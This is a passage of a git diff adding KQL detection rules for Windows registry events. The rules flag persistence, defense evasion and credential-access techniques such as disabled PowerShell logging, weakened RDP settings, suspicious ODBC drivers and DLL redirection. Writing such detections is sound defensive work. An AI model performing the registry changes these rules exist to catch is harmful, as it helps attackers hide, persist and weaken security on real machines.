+| where (RegistryKey contains "Control Panel\\Desktop" or RegistryKey contains "CurrentVersion\\Policies\\ActiveDesktop" or RegistryKey contains "CurrentVersion\\Policies\\System") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "NoChangingWallpaper") or RegistryKey endswith "\\Wallpaper" or (RegistryValueData =~ "2" and RegistryKey endswith "\\WallpaperStyle")) and (not(((RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\Control Panel\\Desktop\\Wallpaper") or InitiatingProcessFolderPath endswith "C:\\Windows\\Explorer.EXE" or InitiatingProcessFolderPath endswith "\\svchost.exe"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Amazon\\EC2Launch\\EC2Launch.exe", "C:\\Program Files (x86)\\Amazon\\EC2Launch\\EC2Launch.exe")) and RegistryKey endswith "\\Control Panel\\Desktop\\Wallpaper")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potentially_suspicious_odbc_driver_registered.kql b/KQL/rules/windows/registry/registry_set/potentially_suspicious_odbc_driver_registered.kql
new file mode 100644
index 00000000..243c576f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potentially_suspicious_odbc_driver_registered.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious ODBC Driver Registered
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-23
+// Level: high
+// Description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.persistence, attack.t1003
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryValueData contains ":\\PerfLogs\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Registration\\CRMLog" or RegistryValueData contains ":\\Windows\\System32\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\System32\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\drivers\\color\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\PRINTERS\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\SERVERS\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks_Migrated\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\Tasks\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains ":\\Windows\\Tracing\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\") and RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*" and (RegistryKey endswith "\\Driver" or RegistryKey endswith "\\Setup")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/powershell_as_a_service_in_registry.kql b/KQL/rules/windows/registry/registry_set/powershell_as_a_service_in_registry.kql
new file mode 100644
index 00000000..72677325
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/powershell_as_a_service_in_registry.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell as a Service in Registry
+// Author: oscd.community, Natalia Shornikova
+// Date: 2020-10-06
+// Level: high
+// Description: Detects that a powershell code is written to the registry as a service.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryKey endswith "\\Services*" and RegistryKey endswith "\\ImagePath"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/powershell_logging_disabled_via_registry_key_tampering.kql b/KQL/rules/windows/registry/registry_set/powershell_logging_disabled_via_registry_key_tampering.kql
new file mode 100644
index 00000000..ff2eeb02
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/powershell_logging_disabled_via_registry_key_tampering.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Logging Disabled Via Registry Key Tampering
+// Author: frack113
+// Date: 2022-04-02
+// Level: high
+// Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001, attack.t1112, attack.persistence
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\PowerShell*" or RegistryKey endswith "\\Microsoft\\PowerShellCore*") and (RegistryKey endswith "\\ModuleLogging\\EnableModuleLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockInvocationLogging" or RegistryKey endswith "\\Transcription\\EnableTranscripting" or RegistryKey endswith "\\Transcription\\EnableInvocationHeader" or RegistryKey endswith "\\EnableScripts")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/powershell_script_execution_policy_enabled.kql b/KQL/rules/windows/registry/registry_set/powershell_script_execution_policy_enabled.kql
new file mode 100644
index 00000000..dd078f85
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/powershell_script_execution_policy_enabled.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Script Execution Policy Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo
+// Date: 2023-10-18
+// Level: low
+// Description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Likely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\EnableScripts"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/pua_sysinternal_tool_execution_registry.kql b/KQL/rules/windows/registry/registry_set/pua_sysinternal_tool_execution_registry.kql
new file mode 100644
index 00000000..5bc3bd52
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/pua_sysinternal_tool_execution_registry.kql
@@ -0,0 +1,13 @@
+// Title: PUA - Sysinternal Tool Execution - Registry
+// Author: Markus Neis
+// Date: 2017-08-28
+// Level: low
+// Description: Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+//   - Legitimate use of SysInternals tools
+//   - Programs that use the same Registry Key
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\EulaAccepted"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/pua_sysinternals_tools_execution_registry.kql b/KQL/rules/windows/registry/registry_set/pua_sysinternals_tools_execution_registry.kql
new file mode 100644
index 00000000..d0b04e6a
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/pua_sysinternals_tools_execution_registry.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Sysinternals Tools Execution - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-24
+// Level: medium
+// Description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+//   - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\SDelete" or RegistryKey contains "\\Sysinternals") and RegistryKey endswith "\\EulaAccepted"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/python_function_execution_security_warning_disabled_in_excel_registry.kql b/KQL/rules/windows/registry/registry_set/python_function_execution_security_warning_disabled_in_excel_registry.kql
new file mode 100644
index 00000000..4ebc73f4
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/python_function_execution_security_warning_disabled_in_excel_registry.kql
@@ -0,0 +1,11 @@
+// Title: Python Function Execution Security Warning Disabled In Excel - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems), @Kostastsale
+// Date: 2024-08-23
+// Level: high
+// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
+// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Office*" and RegistryKey endswith "\\Excel\\Security\\PythonFunctionWarnings"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed.kql b/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed.kql
new file mode 100644
index 00000000..13ad8c41
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed.kql
@@ -0,0 +1,22 @@
+// Title: RDP Sensitive Settings Changed
+// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
+// Date: 2022-08-06
+// Level: high
+// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
+// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
+// Below is a list of registry keys/values that are monitored by this rule:
+// - Shadow: Used to enable Remote Desktop shadowing, which allows an administrator to view or control a user's session.
+// - DisableRemoteDesktopAntiAlias: Disables anti-aliasing for remote desktop sessions.
+// - DisableSecuritySettings: Disables certain security settings for Remote Desktop connections.
+// - fAllowUnsolicited: Allows unsolicited remote assistance offers.
+// - fAllowUnsolicitedFullControl: Allows unsolicited remote assistance offers with full control.
+// - InitialProgram: Specifies a program to run automatically when a user logs on to a remote computer.
+// - ServiceDll: Used in RDP hijacking techniques to specify a custom DLL to be loaded by the Terminal Services service.
+// - SecurityLayer: Specifies the security layer used for RDP connections.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+// False Positives:
+//   - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
+
+DeviceRegistryEvents
+| where (((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Terminal Server\\WinStations\\RDP-Tcp\\SecurityLayer" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram")) and (not((RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SecurityLayer")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed_to_zero.kql b/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed_to_zero.kql
new file mode 100644
index 00000000..c6a6d953
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed_to_zero.kql
@@ -0,0 +1,13 @@
+// Title: RDP Sensitive Settings Changed to Zero
+// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
+// Date: 2022-09-29
+// Level: medium
+// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
+// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+// False Positives:
+//   - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\fDenyTSConnections" or RegistryKey endswith "\\fSingleSessionPerUser" or RegistryKey endswith "\\UserAuthentication")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/register_new_ifiltre_for_persistence.kql b/KQL/rules/windows/registry/registry_set/register_new_ifiltre_for_persistence.kql
new file mode 100644
index 00000000..3b97c86d
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/register_new_ifiltre_for_persistence.kql
@@ -0,0 +1,13 @@
+// Title: Register New IFiltre For Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index.
+// You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - Legitimate registration of IFilters by the OS or software
+
+DeviceRegistryEvents
+| where ((RegistryKey contains "\\SOFTWARE\\Classes\\CLSID" and RegistryKey contains "\\PersistentAddinsRegistered\\{89BCB740-6119-101A-BCB7-00DD010655AF}") or (RegistryKey contains "\\SOFTWARE\\Classes\\." and RegistryKey contains "\\PersistentHandler")) and (not(((RegistryKey endswith "\\CLSID\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}*" or RegistryKey endswith "\\CLSID\\{4887767F-7ADC-4983-B576-88FB643D6F79}*" or RegistryKey endswith "\\CLSID\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}*" or RegistryKey endswith "\\CLSID\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}*" or RegistryKey endswith "\\CLSID\\{098f2470-bae0-11cd-b579-08002b30bfeb}*" or RegistryKey endswith "\\CLSID\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}*" or RegistryKey endswith "\\CLSID\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}*" or RegistryKey endswith "\\CLSID\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}*" or RegistryKey endswith "\\CLSID\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}*" or RegistryKey endswith "\\CLSID\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}*" or RegistryKey endswith "\\CLSID\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}*" or RegistryKey endswith "\\CLSID\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}*" or RegistryKey endswith "\\CLSID\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}*" or RegistryKey endswith "\\CLSID\\{5e941d80-bf96-11cd-b579-08002b30bfeb}*" or RegistryKey endswith "\\CLSID\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}*" or RegistryKey endswith "\\CLSID\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}*" or RegistryKey endswith "\\CLSID\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}*" or RegistryKey endswith "\\CLSID\\{9694E38A-E081-46ac-99A0-8743C909ACB6}*" or RegistryKey endswith "\\CLSID\\{98de59a0-d175-11cd-a7bd-00006b827d94}*" or RegistryKey endswith "\\CLSID\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}*" or RegistryKey endswith "\\CLSID\\{B4132098-7A03-423D-9463-163CB07C151F}*" or RegistryKey endswith "\\CLSID\\{d044309b-5da6-4633-b085-4ed02522e5a5}*" or RegistryKey endswith "\\CLSID\\{D169C14A-5148-4322-92C8-754FC9D018D8}*" or RegistryKey endswith "\\CLSID\\{DD75716E-B42E-4978-BB60-1497B92E30C4}*" or RegistryKey endswith "\\CLSID\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}*" or RegistryKey endswith "\\CLSID\\{E772CEB3-E203-4828-ADF1-765713D981B8}*" or RegistryKey contains "\\CLSID\\{eec97550-47a9-11cf-b952-00aa0051fe20}" or RegistryKey endswith "\\CLSID\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}*") or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/registry_disable_system_restore.kql b/KQL/rules/windows/registry/registry_set/registry_disable_system_restore.kql
new file mode 100644
index 00000000..52c1a66f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/registry_disable_system_restore.kql
@@ -0,0 +1,10 @@
+// Title: Registry Disable System Restore
+// Author: frack113
+// Date: 2022-04-04
+// Level: high
+// Description: Detects the modification of the registry to disable a system restore on the computer
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Policies\\Microsoft\\Windows NT\\SystemRestore" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore") and (RegistryKey endswith "DisableConfig" or RegistryKey endswith "DisableSR")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/registry_explorer_policy_modification.kql b/KQL/rules/windows/registry/registry_set/registry_explorer_policy_modification.kql
new file mode 100644
index 00000000..cf0c28fe
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/registry_explorer_policy_modification.kql
@@ -0,0 +1,12 @@
+// Title: Registry Explorer Policy Modification
+// Author: frack113
+// Date: 2022-03-18
+// Level: medium
+// Description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Legitimate admin script
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskbar" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoPropertiesMyDocuments" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoTrayContextMenu")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/registry_hide_function_from_user.kql b/KQL/rules/windows/registry/registry_set/registry_hide_function_from_user.kql
new file mode 100644
index 00000000..085d597f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/registry_hide_function_from_user.kql
@@ -0,0 +1,12 @@
+// Title: Registry Hide Function from User
+// Author: frack113
+// Date: 2022-03-18
+// Level: medium
+// Description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Legitimate admin script
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowInfoTip" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowCompColor")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideClock" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAHealth" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCANetwork" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAPower" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAVolume"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/registry_modification_for_oci_dll_redirection.kql b/KQL/rules/windows/registry/registry_set/registry_modification_for_oci_dll_redirection.kql
new file mode 100644
index 00000000..95e35eea
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/registry_modification_for_oci_dll_redirection.kql
@@ -0,0 +1,13 @@
+// Title: Registry Modification for OCI DLL Redirection
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2026-01-24
+// Level: high
+// Description: Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings.
+// Threat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious DLL, facilitating phantom DLL hijacking via the MSDTC service.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1112, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\\OracleOciLib" and (not(RegistryValueData contains "oci.dll"))) or (RegistryKey endswith "\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\\OracleOciLibPath" and (not(RegistryValueData contains "%SystemRoot%\\System32\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/registry_modification_to_hidden_file_extension.kql b/KQL/rules/windows/registry/registry_set/registry_modification_to_hidden_file_extension.kql
new file mode 100644
index 00000000..87dfa661
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/registry_modification_to_hidden_file_extension.kql
@@ -0,0 +1,12 @@
+// Title: Registry Modification to Hidden File Extension
+// Author: frack113
+// Date: 2022-01-22
+// Level: medium
+// Description: Hides the file extension through modification of the registry
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137
+// False Positives:
+//   - Administrative scripts
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/registry_persistence_via_explorer_run_key.kql b/KQL/rules/windows/registry/registry_set/registry_persistence_via_explorer_run_key.kql
new file mode 100644
index 00000000..865f2147
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/registry_persistence_via_explorer_run_key.kql
@@ -0,0 +1,10 @@
+// Title: Registry Persistence via Explorer Run Key
+// Author: Florian Roth (Nextron Systems), oscd.community
+// Date: 2018-07-18
+// Level: high
+// Description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+
+DeviceRegistryEvents
+| where (RegistryValueData contains ":\\$Recycle.bin\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Default\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/registry_persistence_via_service_in_safe_mode.kql b/KQL/rules/windows/registry/registry_set/registry_persistence_via_service_in_safe_mode.kql
new file mode 100644
index 00000000..4d45978d
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/registry_persistence_via_service_in_safe_mode.kql
@@ -0,0 +1,10 @@
+// Title: Registry Persistence via Service in Safe Mode
+// Author: frack113
+// Date: 2022-04-04
+// Level: high
+// Description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "Service" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal*" or RegistryKey endswith "\\Control\\SafeBoot\\Network*") and RegistryKey endswith "\\(Default)") and (not(((RegistryValueData =~ "Service" and InitiatingProcessFolderPath =~ "C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\Hexnode Updater\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\Hexnode Updater\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\Hexnode Agent\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\Hexnode Agent\\(Default)")) or (RegistryValueData =~ "Service" and InitiatingProcessFolderPath endswith "\\MBAMInstallerService.exe" and RegistryKey endswith "\\MBAMService\\(Default)") or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\SAVService\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\SAVService\\(Default)")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/restrictedadminmode_registry_value_tampering.kql b/KQL/rules/windows/registry/registry_set/restrictedadminmode_registry_value_tampering.kql
new file mode 100644
index 00000000..e75d715f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/restrictedadminmode_registry_value_tampering.kql
@@ -0,0 +1,12 @@
+// Title: RestrictedAdminMode Registry Value Tampering
+// Author: frack113
+// Date: 2023-01-13
+// Level: high
+// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
+// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
+// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql b/KQL/rules/windows/registry/registry_set/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql
new file mode 100644
index 00000000..6f0b3b69
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql
@@ -0,0 +1,10 @@
+// Title: Running Chrome VPN Extensions via the Registry 2 VPN Extension
+// Author: frack113
+// Date: 2021-12-28
+// Level: high
+// Description: Running Chrome VPN Extensions via the Registry install 2 vpn extension
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.t1133
+
+DeviceRegistryEvents
+| where (RegistryKey contains "Software\\Wow6432Node\\Google\\Chrome\\Extensions" and RegistryKey endswith "update_url") and (RegistryKey contains "fdcgdnkidjaadafnichfpabhfomcebme" or RegistryKey contains "fcfhplploccackoneaefokcmbjfbkenj" or RegistryKey contains "bihmplhobchoageeokmgbdihknkjbknd" or RegistryKey contains "gkojfkhlekighikafcpjkiklfbnlmeio" or RegistryKey contains "jajilbjjinjmgcibalaakngmkilboobh" or RegistryKey contains "gjknjjomckknofjidppipffbpoekiipm" or RegistryKey contains "nabbmpekekjknlbkgpodfndbodhijjem" or RegistryKey contains "kpiecbcckbofpmkkkdibbllpinceiihk" or RegistryKey contains "nlbejmccbhkncgokjcmghpfloaajcffj" or RegistryKey contains "omghfjlpggmjjaagoclmmobgdodcjboh" or RegistryKey contains "bibjcjfmgapbfoljiojpipaooddpkpai" or RegistryKey contains "mpcaainmfjjigeicjnlkdfajbioopjko" or RegistryKey contains "jljopmgdobloagejpohpldgkiellmfnc" or RegistryKey contains "lochiccbgeohimldjooaakjllnafhaid" or RegistryKey contains "nhnfcgpcbfclhfafjlooihdfghaeinfc" or RegistryKey contains "ookhnhpkphagefgdiemllfajmkdkcaim" or RegistryKey contains "namfblliamklmeodpcelkokjbffgmeoo" or RegistryKey contains 